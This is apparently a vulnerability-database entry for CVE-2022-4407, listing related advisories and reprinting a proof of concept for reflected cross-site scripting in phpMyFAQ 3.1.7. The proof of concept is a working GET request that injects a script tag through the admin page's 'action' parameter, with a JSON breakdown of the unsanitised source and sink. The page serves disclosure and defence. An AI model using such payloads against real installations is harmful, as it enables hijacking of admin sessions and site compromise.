| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| Reflect Cross Site Scripting | 26 Nov 202214:30 | – | huntr | |
| CVE-2022-4407 | 11 Dec 202215:15 | – | attackerkb | |
| CVE-2022-4407 | 11 Dec 202218:20 | – | circl | |
| phpMyFAQ 跨站脚本漏洞 | 11 Dec 202200:00 | – | cnnvd | |
| CVE-2022-4407 | 11 Dec 202200:00 | – | cve | |
| CVE-2022-4407 Cross-site Scripting (XSS) - Reflected in thorsten/phpmyfaq | 11 Dec 202200:00 | – | cvelist | |
| EUVD-2022-7603 | 3 Oct 202520:07 | – | euvd | |
| phpMyFAQ vulnerable to Cross-site Scripting | 11 Dec 202215:30 | – | github | |
| CVE-2022-4407 | 11 Dec 202215:15 | – | nvd | |
| phpMyFAQ < 3.1.9 Multiple Vulnerabilities | 12 Dec 202200:00 | – | openvas |
# Exploit Title: phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ
# Software Link: https://github.com/thorsten/phpMyFAQ
# Version: 3.1.7
# Tested on: Ubuntu Windows
# CVE : CVE-2022-4407
PoC:
Get: http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>
Details:
{
"Sink": "phpmyfaq/admin/header.php - HTML attribute in the form action parameter",
"Vulnerable Variable": "action",
"Source": "phpmyfaq/admin/index.php - Filter::filterInput(INPUT_GET, 'action', FILTER_UNSAFE_RAW)",
"Sanitization Mechanisms Before Patch": "None - Input directly used without escaping or encoding in the HTML attribute",
"Sink Context Constraints": "HTML attribute context - needs proper escaping to break out of attribute",
"Attack Payload": "\"><script>alert('XSS')</script>",
"Execution Path Constraints": "The 'action' parameter must be passed via GET or POST without prior sanitization or if it is null, it must be taken from 'redirect-action' parameter unless it equals 'logout'",
"Request Parameters": "action",
"Request URL": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>",
"Request Method": "GET",
"Final PoC": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>"
}
[Replace Your Domain Name]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation